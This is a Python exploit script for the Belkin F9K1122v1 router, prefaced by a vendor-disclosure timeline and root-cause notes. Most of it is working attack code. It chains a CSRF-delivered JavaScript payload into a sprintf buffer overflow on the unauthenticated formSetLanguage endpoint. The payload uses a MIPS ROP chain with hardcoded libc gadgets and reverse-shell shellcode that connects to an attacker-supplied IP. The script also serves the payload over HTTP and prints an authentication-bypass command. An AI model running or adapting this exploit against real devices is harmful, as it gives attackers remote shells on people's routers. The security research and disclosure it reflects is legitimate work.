266 lines
No EOL
8.5 KiB
Python
Executable file
266 lines
No EOL
8.5 KiB
Python
Executable file
import socket, sys , base64, struct, string, urllib
|
|
from getopt import getopt as GetOpt, GetoptError
|
|
from uuid import getnode as get_mac
|
|
import SimpleHTTPServer, SocketServer
|
|
|
|
|
|
# TIMELINE #
|
|
'''
|
|
3/16/2016 - First Submission to Belkin [no response]
|
|
5/3/2016 - Second Submission to Belkin [no response]
|
|
6/4/2016 - Notification of 0day [vendor responded]
|
|
Vendor Response: Our email system was broken but we want another 90 days.
|
|
9/3/2016 - Notification of 0day sent to Belkin. [no response]
|
|
9/4/2016 - The second 90 day extension is over.
|
|
'''
|
|
|
|
|
|
# Root cause analysis and all of that fun stuff
|
|
'''
|
|
This is the CSRF PoC. You will need to embed your JS soruce somewhere. '<script src=//ip.addr/a.js>'
|
|
The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible.
|
|
XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs.
|
|
There is no protection against CSRFs so I made this CSRF PoC.
|
|
|
|
|
|
The BoF Vulnerability:
|
|
|
|
File Name: fmmgmt.c
|
|
-------------------------------------------------------------
|
|
void formSetLanguage(webs_t wp, char_t *path, char_t *query)
|
|
{
|
|
[CUT]
|
|
...
|
|
if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){
|
|
strcpy(tmpbuf, T("Set WEB language error!"));
|
|
goto setErr;
|
|
}
|
|
apmib_update(CURRENT_SETTING);
|
|
setErr:
|
|
urltmp = websGetVar(wp, T("webpage"), T(""));
|
|
sprintf(tmpbuf, "/%s", urltmp);
|
|
-------------------------------------------------------------
|
|
|
|
In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!
|
|
|
|
ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable.
|
|
'''
|
|
|
|
|
|
# GREETZ
|
|
'''
|
|
@AustinHackers - I love you all <3
|
|
@Laughing_Mantis - Cause I said I would!
|
|
@MisterCh0c - Keep on h4x0ring IoT products!
|
|
@IoTVillage - You guys rock!
|
|
@HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D
|
|
@avicoder - cause you're awesome! :D
|
|
@TheZDI - If it weren't for your comment of wanting me to bypass auth then I wouldn't of found these vulns.
|
|
|
|
Everyone over at Praetorian - You guys are awesome <3.
|
|
'''
|
|
|
|
|
|
def usage():
|
|
print ""
|
|
print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
|
|
print "By: Elvis Collado [b1ack0wl]"
|
|
print ""
|
|
print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
|
|
print ""
|
|
print "\t-s Connect back IP [LHOST]"
|
|
print "\t-d Destination IP of Socket Listener [RHOST]"
|
|
print "\t-h Print this Help Menu"
|
|
print ""
|
|
sys.exit(1)
|
|
|
|
|
|
# Hacky but whatever it gets the point across.
|
|
if len(sys.argv) < 3:
|
|
usage()
|
|
|
|
try:
|
|
(opts, args) = GetOpt(sys.argv[1:], 's:d:h')
|
|
except GetoptError, e:
|
|
usage()
|
|
for opt, arg in opts:
|
|
if opt == "-s":
|
|
connectback_ip = arg.split(".")
|
|
for a in connectback_ip:
|
|
if int(a) == 0:
|
|
print "IP cannot have NULL Bytes :("
|
|
sys.exit(1)
|
|
|
|
IP_1= struct.pack("<B",int(connectback_ip[0]))
|
|
IP_2= struct.pack("<B",int(connectback_ip[1]))
|
|
IP_3= struct.pack("<B",int(connectback_ip[2]))
|
|
IP_4= struct.pack("<B",int(connectback_ip[3]))
|
|
elif opt == "-d":
|
|
host = arg
|
|
elif opt == "-h":
|
|
usage()
|
|
|
|
|
|
# Shellcode from bowcaster.
|
|
|
|
shellcode = string.join([
|
|
"\x24\x0f\xff\xfa", # li t7,-6
|
|
"\x01\xe0\x78\x27", # nor t7,t7,zero
|
|
"\x21\xe4\xff\xfd", # addi a0,t7,-3
|
|
"\x21\xe5\xff\xfd", # addi a1,t7,-3
|
|
"\x28\x06\xff\xff", # slti a2,zero,-1
|
|
"\x24\x02\x10\x57", # li v0,4183
|
|
"\x01\x01\x01\x0c", # syscall 0x40404
|
|
"\xaf\xa2\xff\xff", # sw v0,-1(sp)
|
|
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
|
|
"\x34\x0f\xff\xfd", # li t7,0xfffd
|
|
"\x01\xe0\x78\x27", # nor t7,t7,zero
|
|
"\xaf\xaf\xff\xe0", # sw t7,-32(sp)
|
|
|
|
# Port 8080
|
|
"\x3c\x0e\x1f\x90", # lui t6,0x1f90
|
|
"\x35\xce\x1f\x90", # ori t6,t6,0x1f90
|
|
|
|
# Store Port
|
|
"\xaf\xae\xff\xe4", # sw t6,-28(sp)
|
|
|
|
# Big endian IP address 192.168.206.2
|
|
"\x3c\x0e"+IP_1+IP_2, # lui t6,0x7f01
|
|
"\x35\xce"+IP_3+IP_4, # ori t6,t6,0x101
|
|
|
|
"\xaf\xae\xff\xe6", # sw t6,-26(sp)
|
|
|
|
"\x27\xa5\xff\xe2", # addiu a1,sp,-30
|
|
"\x24\x0c\xff\xef", # li t4,-17
|
|
"\x01\x80\x30\x27", # nor a2,t4,zero
|
|
"\x24\x02\x10\x4a", # li v0,4170
|
|
"\x01\x01\x01\x0c", # syscall 0x40404
|
|
"\x24\x0f\xff\xfd", # li t7,-3
|
|
"\x01\xe0\x78\x27", # nor t7,t7,zero
|
|
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
|
|
"\x01\xe0\x28\x21", # move a1,t7
|
|
"\x24\x02\x0f\xdf", # li v0,4063
|
|
"\x01\x01\x01\x0c", # syscall 0x40404
|
|
"\x24\x10\xff\xff", # li s0,-1
|
|
"\x21\xef\xff\xff", # addi t7,t7,-1
|
|
"\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop>
|
|
"\x28\x06\xff\xff", # slti a2,zero,-1
|
|
"\x3c\x0f\x2f\x2f", # lui t7,0x2f2f
|
|
"\x35\xef\x62\x69", # ori t7,t7,0x6269
|
|
"\xaf\xaf\xff\xec", # sw t7,-20(sp)
|
|
"\x3c\x0e\x6e\x2f", # lui t6,0x6e2f
|
|
"\x35\xce\x73\x68", # ori t6,t6,0x7368
|
|
"\xaf\xae\xff\xf0", # sw t6,-16(sp)
|
|
"\xaf\xa0\xff\xf4", # sw zero,-12(sp)
|
|
"\x27\xa4\xff\xec", # addiu a0,sp,-20
|
|
"\xaf\xa4\xff\xf8", # sw a0,-8(sp)
|
|
"\xaf\xa0\xff\xfc", # sw zero,-4(sp)
|
|
"\x27\xa5\xff\xf8", # addiu a1,sp,-8
|
|
"\x24\x02\x0f\xab", # li v0,4011
|
|
"\x01\x01\x01\x0c" # syscall 0x40404
|
|
], '')
|
|
|
|
|
|
|
|
|
|
# getRect() son
|
|
huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D
|
|
huge_string += "!" # Filler
|
|
huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep
|
|
huge_string += "\x43\x43\x43\x43" # s1 but after sleep it's just padding
|
|
huge_string += struct.pack(">L",0x2aafc840) # RA OverWrite # move t9,s0 jalr t9
|
|
huge_string += "\x44\x44\x44\x44" * 6 # padding
|
|
huge_string += struct.pack(">L",0x31313131) # s0 - Sleep
|
|
huge_string += struct.pack(">L",0x2aafc840) # s1
|
|
huge_string += struct.pack(">L",0x34343434) # s2
|
|
huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA
|
|
huge_string += "\x45\x45\x45\x45" * 9 # Padding
|
|
huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA
|
|
huge_string += "\x46\x46\x46\x46" * 10
|
|
huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled.
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += struct.pack(">L",0x2739e8b8)
|
|
huge_string += "\x47\x47\x47\x47" # Padding becomes NULL
|
|
huge_string += shellcode # shellcode start
|
|
|
|
|
|
'''
|
|
|
|
NOTES
|
|
|
|
libc = 0x2aad0000
|
|
|
|
0x2aafc840 (Sleep)
|
|
|
|
Gadget 1
|
|
|
|
0x2aafc840: move t9,s0 # Sleep
|
|
0x2aafc844: jalr t9 # call sleep. The rest of the instructions will not block out payload and are not included.
|
|
|
|
|
|
Gadget 2
|
|
|
|
0x2aaf9f38: move t9,s1 # Addr to Gadget 3
|
|
0x2aaf9f3c: lw ra,52(sp)
|
|
0x2aaf9f40: lw s3,48(sp)
|
|
0x2aaf9f44: lw s2,44(sp)
|
|
0x2aaf9f48: lw s1,40(sp)
|
|
0x2aaf9f4c: lw s0,36(sp)
|
|
0x2aaf9f50: jr t9 # Call Gadget 3
|
|
|
|
|
|
|
|
Gadget 3
|
|
|
|
0x2aaf9808: addiu a0,sp,24 # Add offet +24 to SP and store it in A0
|
|
0x2aaf980c: lw ra,52(sp) # load Ret addr
|
|
0x2aaf9810: jr ra # ret
|
|
|
|
|
|
|
|
Gadget 4 (Stack Exec)
|
|
|
|
0x2aaf97fc: move t9,a0 # move A0 which contains the address of the stack
|
|
0x2aaf9800: sw v0,24(sp)
|
|
0x2aaf9804: jalr t9 # Jump to the stack
|
|
0x2aaf9808: addiu a0,sp,24 # Before jumping, add +24 to the stack and store it in A0
|
|
|
|
'''
|
|
|
|
|
|
csrf_file = open('a.js', 'wb')
|
|
params = urllib.urlencode({'webpage': huge_string}) # Vulnerable parameter
|
|
destination_addr = 'x.open("POST", "http://' + host + '/goform/formSetLanguage"' + ',true);\n' # Vulnerable Endpoint that does not require authentication
|
|
|
|
# Write CSRF PoC
|
|
csrf_file.write('function getrekt(){')
|
|
csrf_file.write('var x = new XMLHttpRequest();\n')
|
|
csrf_file.write(destination_addr)
|
|
csrf_file.write('x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n')
|
|
csrf_file.write('x.send("' + params + '");')
|
|
csrf_file.write('}\ngetrekt();')
|
|
|
|
# Close file since we're doing writing to it.
|
|
csrf_file.close()
|
|
|
|
|
|
# Now Host the CSRF File
|
|
mac = get_mac()
|
|
PORT = 80 # This is why superuser rights are needed
|
|
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
|
|
httpd = SocketServer.TCPServer(("", PORT), Handler)
|
|
mac_addr = ':'.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
|
|
print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT
|
|
print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m"
|
|
httpd.serve_forever() |